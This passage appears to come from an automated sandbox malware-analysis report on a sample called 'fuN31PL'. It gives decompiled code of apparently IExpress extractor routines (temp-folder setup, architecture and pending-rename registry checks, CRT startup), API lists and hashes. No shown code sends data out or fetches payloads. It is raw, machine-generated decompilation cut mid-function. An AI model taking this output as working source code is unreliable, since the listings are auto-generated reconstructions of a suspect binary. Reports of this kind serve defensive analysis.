                                                                                                                                                                                                                                              				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t10;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				intOrPtr _t14;
                                                                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                                                                              				CHAR* _t48;
                                                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t10 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				if(__edx == 0) {
                                                                                                                                                                                                                                              					_t48 = 0x1a91e4;
                                                                                                                                                                                                                                              					_t42 = 0x104;
                                                                                                                                                                                                                                              					E001A1680(0x1a91e4, 0x104);
                                                                                                                                                                                                                                              					L14:
                                                                                                                                                                                                                                              					_t13 = E001A58C8(_t48); // executed
                                                                                                                                                                                                                                              					if(_t13 != 0) {
                                                                                                                                                                                                                                              						L17:
                                                                                                                                                                                                                                              						_t42 = _a4;
                                                                                                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                                                              							 *0x1a9124 = 0;
                                                                                                                                                                                                                                              							_t14 = 1;
                                                                                                                                                                                                                                              							L24:
                                                                                                                                                                                                                                              							return E001A6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t16 = E001A597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                              						if(_t16 != 0) {
                                                                                                                                                                                                                                              							goto L23;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t61 =  *0x1a8a20; // 0x0
                                                                                                                                                                                                                                              						if(_t61 != 0) {
                                                                                                                                                                                                                                              							 *0x1a8a20 = 0;
                                                                                                                                                                                                                                              							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L22:
                                                                                                                                                                                                                                              						_t14 = 0;
                                                                                                                                                                                                                                              						goto L24;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                              						 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0x1a8a20 = 1;
                                                                                                                                                                                                                                              					goto L17;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t42 =  &_v268;
                                                                                                                                                                                                                                              				_t20 = E001A53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                              				if(_t20 == 0) {
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t48 = 0x1a91e4;
                                                                                                                                                                                                                                              				E001A1781(0x1a91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                              				if(( *0x1a9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_t42 = 0x104;
                                                                                                                                                                                                                                              					E001A658A(_t48, 0x104, 0x1a1140);
                                                                                                                                                                                                                                              					goto L14;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                              				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                              				if(_t26 == 0) {
                                                                                                                                                                                                                                              					_push("i386");
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					E001A658A(_t48, 0x104);
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t28 = _t26 - 1;
                                                                                                                                                                                                                                              				if(_t28 == 0) {
                                                                                                                                                                                                                                              					_push("mips");
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t29 = _t28 - 1;
                                                                                                                                                                                                                                              				if(_t29 == 0) {
                                                                                                                                                                                                                                              					_push("alpha");
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t29 != 1) {
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push("ppc");
                                                                                                                                                                                                                                              				goto L11;
                                                                                                                                                                                                                                              			}





















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A54C9
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A553D
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A556F
                                                                                                                                                                                                                                                • Part of subcall function 001A53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A53FB
                                                                                                                                                                                                                                                • Part of subcall function 001A53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A5402
                                                                                                                                                                                                                                                • Part of subcall function 001A53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A541F
                                                                                                                                                                                                                                                • Part of subcall function 001A53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A542B
                                                                                                                                                                                                                                                • Part of subcall function 001A53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A5434
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                              • API String ID: 1979080616-772166365
                                                                                                                                                                                                                                              • Opcode ID: 466f2d04c97931dd51b7ed9852b5345299cbb06be3f0bb21155e9cc41f34ed04
                                                                                                                                                                                                                                              • Instruction ID: 7770fcd0acac24a9eb8e2367dd9141ea618f8edac6231762df4110c7cf000d8c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 466f2d04c97931dd51b7ed9852b5345299cbb06be3f0bb21155e9cc41f34ed04
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 583127BDF08A106BCB159F299D4497F77ABAF93760F04012AB802D3950EB70CE818A91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              control_flow_graph 563 1a256d-1a257d 564 1a2622-1a2627 call 1a24e0 563->564 565 1a2583-1a2589 563->565 570 1a2629-1a262f 564->570 567 1a258b 565->567 568 1a25e8-1a2607 RegOpenKeyExA 565->568 567->570 571 1a2591-1a2595 567->571 572 1a2609-1a2620 RegQueryInfoKeyA 568->572 573 1a25e3-1a25e6 568->573 571->570 575 1a259b-1a25ba RegOpenKeyExA 571->575 574 1a25d1-1a25dd RegCloseKey 572->574 573->570 574->573 575->573 576 1a25bc-1a25cb RegQueryValueExA 575->576 576->574
                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E001A256D(signed int __ecx) {
                                                                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				long _t24;
                                                                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                                                                              				int _t31;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                              				_t31 = 0;
                                                                                                                                                                                                                                              				if(_t13 == 0) {
                                                                                                                                                                                                                                              					_t31 = E001A24E0(_t26);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t34 = _t13 - 1;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						_v8 = 0;
                                                                                                                                                                                                                                              						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                              							goto L7;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L12:
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                              							_v8 = 0;
                                                                                                                                                                                                                                              							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                              							if(_t24 == 0) {
                                                                                                                                                                                                                                              								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                              								L6:
                                                                                                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                                                                                                              								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                              								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							L7:
                                                                                                                                                                                                                                              							_t31 = _v8;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t31;
                                                                                                                                                                                                                                              				goto L12;
                                                                                                                                                                                                                                              			}

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,001A4096,001A4096,?,001A1ED3,00000001,00000000,?,?,001A4137,?), ref: 001A25B2
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,001A4096,?,001A1ED3,00000001,00000000,?,?,001A4137,?,001A4096), ref: 001A25CB
                                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,001A1ED3,00000001,00000000,?,?,001A4137,?,001A4096), ref: 001A25DD
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,001A4096,001A4096,?,001A1ED3,00000001,00000000,?,?,001A4137,?), ref: 001A25FF
                                                                                                                                                                                                                                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,001A4096,00000000,00000000,00000000,00000000,?,001A1ED3,00000001,00000000), ref: 001A261A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • PendingFileRenameOperations, xrefs: 001A25C3
                                                                                                                                                                                                                                              • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 001A25F5
                                                                                                                                                                                                                                              • System\CurrentControlSet\Control\Session Manager, xrefs: 001A25A8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                              • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                              • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                              • Opcode ID: 95c2d6ddbe116d426cdd8ee4a15b1d897621120aabf45f548276a43e13e73f5d
                                                                                                                                                                                                                                              • Instruction ID: 3f42c35c9ee2fa6ea50bf840fc718341ef705d483a2c6c04c61964e3e83f097c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95c2d6ddbe116d426cdd8ee4a15b1d897621120aabf45f548276a43e13e73f5d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43114C79D42228BBDB209B969D09DFBBE7CEF177A1F504055F808A2010DB305E49E6A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              control_flow_graph 577 1a6a60-1a6a91 call 1a7155 call 1a7208 GetStartupInfoW 583 1a6a93-1a6aa2 577->583 584 1a6abc-1a6abe 583->584 585 1a6aa4-1a6aa6 583->585 588 1a6abf-1a6ac5 584->588 586 1a6aa8-1a6aad 585->586 587 1a6aaf-1a6aba Sleep 585->587 586->588 587->583 589 1a6ad1-1a6ad7 588->589 590 1a6ac7-1a6acf _amsg_exit 588->590 592 1a6ad9-1a6ae9 call 1a6c3f 589->592 593 1a6b05 589->593 591 1a6b0b-1a6b11 590->591 595 1a6b2e-1a6b30 591->595 596 1a6b13-1a6b24 _initterm 591->596 597 1a6aee-1a6af2 592->597 593->591 598 1a6b3b-1a6b42 595->598 599 1a6b32-1a6b39 595->599 596->595 597->591 602 1a6af4-1a6b00 597->602 600 1a6b67-1a6b71 598->600 601 1a6b44-1a6b51 call 1a7060 598->601 599->598 604 1a6b74-1a6b79 600->604 601->600 610 1a6b53-1a6b65 601->610 605 1a6c39-1a6c3e call 1a724d 602->605 608 1a6b7b-1a6b7d 604->608 609 1a6bc5-1a6bc8 604->609 614 1a6b7f-1a6b81 608->614 615 1a6b94-1a6b98 608->615 611 1a6bca-1a6bd3 609->611 612 1a6bd6-1a6be3 _ismbblead 609->612 610->600 611->612 616 1a6be9-1a6bed 612->616 617 1a6be5-1a6be6 612->617 614->609 618 1a6b83-1a6b85 614->618 619 1a6b9a-1a6b9e 615->619 620 1a6ba0-1a6ba2 615->620 616->604 623 1a6c1e-1a6c25 616->623 617->616 618->615 624 1a6b87-1a6b8a 618->624 621 1a6ba3-1a6bbc call 1a2bfb 619->621 620->621 621->623 630 1a6bbe-1a6bbf exit 621->630 626 1a6c32 623->626 627 1a6c27-1a6c2d _cexit 623->627 624->615 628 1a6b8c-1a6b92 624->628 626->605 627->626 628->618 630->609
                                                                                                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                                                                                                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                              				signed int* _t25;
                                                                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                                                              				signed char _t41;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              				signed int _t54;
                                                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                                                                              				signed int _t59;
                                                                                                                                                                                                                                              				intOrPtr* _t60;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				void* _t67;
                                                                                                                                                                                                                                              				void* _t68;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				E001A7155();
                                                                                                                                                                                                                                              				_push(0x58);
                                                                                                                                                                                                                                              				_push(0x1a72b8);
                                                                                                                                                                                                                                              				E001A7208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                              				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                              				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                              				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                              				_t53 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                              					if(0 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(0 != _t56) {
                                                                                                                                                                                                                                              						Sleep(0x3e8);
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t58 = 1;
                                                                                                                                                                                                                                              						_t53 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L7:
                                                                                                                                                                                                                                              					_t67 =  *0x1a88b0 - _t58; // 0x2
                                                                                                                                                                                                                                              					if(_t67 != 0) {
                                                                                                                                                                                                                                              						__eflags =  *0x1a88b0; // 0x2
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							 *0x1a81e4 = _t58;
                                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							 *0x1a88b0 = _t58;
                                                                                                                                                                                                                                              							_t37 = E001A6C3F(0x1a10b8, 0x1a10c4); // executed
                                                                                                                                                                                                                                              							__eflags = _t37;
                                                                                                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                                                                                                              								goto L13;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                              								_t30 = 0xff;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_push(0x1f);
                                                                                                                                                                                                                                              						L001A6FF4();
                                                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                                                              						_t68 =  *0x1a88b0 - _t58; // 0x2
                                                                                                                                                                                                                                              						if(_t68 == 0) {
                                                                                                                                                                                                                                              							_push(0x1a10b4);
                                                                                                                                                                                                                                              							_push(0x1a10ac);
                                                                                                                                                                                                                                              							L001A7202();
                                                                                                                                                                                                                                              							 *0x1a88b0 = 2;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if(_t53 == 0) {
                                                                                                                                                                                                                                              							 *0x1a88ac = 0;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t71 =  *0x1a88b4;
                                                                                                                                                                                                                                              						if( *0x1a88b4 != 0 && E001A7060(_t71, 0x1a88b4) != 0) {
                                                                                                                                                                                                                                              							_t60 =  *0x1a88b4; // 0x0
                                                                                                                                                                                                                                              							 *0x1aa288(0, 2, 0);
                                                                                                                                                                                                                                              							 *_t60();
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                                                              						_t59 =  *_t25;
			 *(_t62 - 0x1c) = _t59;
			_t54 =  *(_t62 - 0x20);
			while(1) {
				_t41 =  *_t59;
				if(_t41 > 0x20) {
					goto L32;
				}
				if(_t41 != 0) {
					if(_t54 != 0) {
						goto L32;
					} else {
						while(_t41 != 0 && _t41 <= 0x20) {
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
							_t41 =  *_t59;
						}
					}
				}
				__eflags =  *(_t62 - 0x3c) & 0x00000001;
				if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
					_t29 = 0xa;
				} else {
					_t29 =  *(_t62 - 0x38) & 0x0000ffff;
				}
				_push(_t29);
				_t30 = E001A2BFB(0x1a0000, 0, _t59); // executed
				 *0x1a81e0 = _t30;
				__eflags =  *0x1a81f8;
				if( *0x1a81f8 == 0) {
					exit(_t30); // executed
					goto L32;
				}
				__eflags =  *0x1a81e4;
				if( *0x1a81e4 == 0) {
					__imp___cexit();
					_t30 =  *0x1a81e0; // 0x80070002
				}
				 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
				goto L40;
				L32:
				__eflags = _t41 - 0x22;
				if(_t41 == 0x22) {
					__eflags = _t54;
					_t15 = _t54 == 0;
					__eflags = _t15;
					_t54 = 0 | _t15;
					 *(_t62 - 0x20) = _t54;
				}
				_t26 = _t41 & 0x000000ff;
				__imp___ismbblead(_t26);
				__eflags = _t26;
				if(_t26 != 0) {
					_t59 = _t59 + 1;
					__eflags = _t59;
					 *(_t62 - 0x1c) = _t59;
				}
				_t59 = _t59 + 1;
				 *(_t62 - 0x1c) = _t59;
			}
		}
		L40:
		return E001A724D(_t30);
	}
	_t58 = 1;
	__eflags = 1;
	goto L7;
}


















                                                                                                                                                                                                                                              0x001a6b90
                                                                                                                                                                                                                                              0x001a6b83
                                                                                                                                                                                                                                              0x001a6b81
                                                                                                                                                                                                                                              0x001a6b94
                                                                                                                                                                                                                                              0x001a6b98
                                                                                                                                                                                                                                              0x001a6ba2
                                                                                                                                                                                                                                              0x001a6b9a
                                                                                                                                                                                                                                              0x001a6b9a
                                                                                                                                                                                                                                              0x001a6b9a
                                                                                                                                                                                                                                              0x001a6ba3
                                                                                                                                                                                                                                              0x001a6bab
                                                                                                                                                                                                                                              0x001a6bb0
                                                                                                                                                                                                                                              0x001a6bb5
                                                                                                                                                                                                                                              0x001a6bbc
                                                                                                                                                                                                                                              0x001a6bbf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6bbf
                                                                                                                                                                                                                                              0x001a6c1e
                                                                                                                                                                                                                                              0x001a6c25
                                                                                                                                                                                                                                              0x001a6c27
                                                                                                                                                                                                                                              0x001a6c2d
                                                                                                                                                                                                                                              0x001a6c2d
                                                                                                                                                                                                                                              0x001a6c32
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a6bc5
                                                                                                                                                                                                                                              0x001a6bc5
                                                                                                                                                                                                                                              0x001a6bc8
                                                                                                                                                                                                                                              0x001a6bcc
                                                                                                                                                                                                                                              0x001a6bce
                                                                                                                                                                                                                                              0x001a6bce
                                                                                                                                                                                                                                              0x001a6bd1
                                                                                                                                                                                                                                              0x001a6bd3
                                                                                                                                                                                                                                              0x001a6bd3
                                                                                                                                                                                                                                              0x001a6bd6
                                                                                                                                                                                                                                              0x001a6bda
                                                                                                                                                                                                                                              0x001a6be1
                                                                                                                                                                                                                                              0x001a6be3
                                                                                                                                                                                                                                              0x001a6be5
                                                                                                                                                                                                                                              0x001a6be5
                                                                                                                                                                                                                                              0x001a6be6
                                                                                                                                                                                                                                              0x001a6be6
                                                                                                                                                                                                                                              0x001a6be9
                                                                                                                                                                                                                                              0x001a6bea
                                                                                                                                                                                                                                              0x001a6bea
                                                                                                                                                                                                                                              0x001a6b74
                                                                                                                                                                                                                                              0x001a6c39
                                                                                                                                                                                                                                              0x001a6c3e
                                                                                                                                                                                                                                              0x001a6c3e
                                                                                                                                                                                                                                              0x001a6abe
                                                                                                                                                                                                                                              0x001a6abe
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001A7182
                                                                                                                                                                                                                                                • Part of subcall function 001A7155: GetCurrentProcessId.KERNEL32 ref: 001A7191
                                                                                                                                                                                                                                                • Part of subcall function 001A7155: GetCurrentThreadId.KERNEL32 ref: 001A719A
                                                                                                                                                                                                                                                • Part of subcall function 001A7155: GetTickCount.KERNEL32 ref: 001A71A3
                                                                                                                                                                                                                                                • Part of subcall function 001A7155: QueryPerformanceCounter.KERNEL32(?), ref: 001A71B8
                                                                                                                                                                                                                                              • GetStartupInfoW.KERNEL32(?,001A72B8,00000058), ref: 001A6A7F
                                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 001A6AB4
                                                                                                                                                                                                                                              • _amsg_exit.MSVCRT ref: 001A6AC9
                                                                                                                                                                                                                                              • _initterm.MSVCRT ref: 001A6B1D
                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 001A6B49
                                                                                                                                                                                                                                              • exit.KERNELBASE ref: 001A6BBF
                                                                                                                                                                                                                                              • _ismbblead.MSVCRT ref: 001A6BDA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 836923961-0
                                                                                                                                                                                                                                              • Opcode ID: c54f3d4c52b80ba2e24f28dea47713212a956e20bec181dc716c90fe1a3044bb
                                                                                                                                                                                                                                              • Instruction ID: 494101464eba052c236e12053e3c24a5a32f9f75a900e380e74153bbf26b314b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c54f3d4c52b80ba2e24f28dea47713212a956e20bec181dc716c90fe1a3044bb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F41DF7DA04225DFDB219B68DD087AE77A0FB4B720F69401AE841E36D0CF784D81CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              control_flow_graph 631 1a58c8-1a58d5 632 1a58d8-1a58dd 631->632 632->632 633 1a58df-1a58f1 LocalAlloc 632->633 634 1a5919-1a5959 call 1a1680 call 1a658a CreateFileA LocalFree 633->634 635 1a58f3-1a5901 call 1a44b9 633->635 639 1a5906-1a5910 call 1a6285 634->639 645 1a595b-1a596c CloseHandle GetFileAttributesA 634->645 635->639 644 1a5912-1a5918 639->644 645->639 646 1a596e-1a5970 645->646 646->639 647 1a5972-1a597b 646->647 647->644
                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E001A58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				signed char _t16;
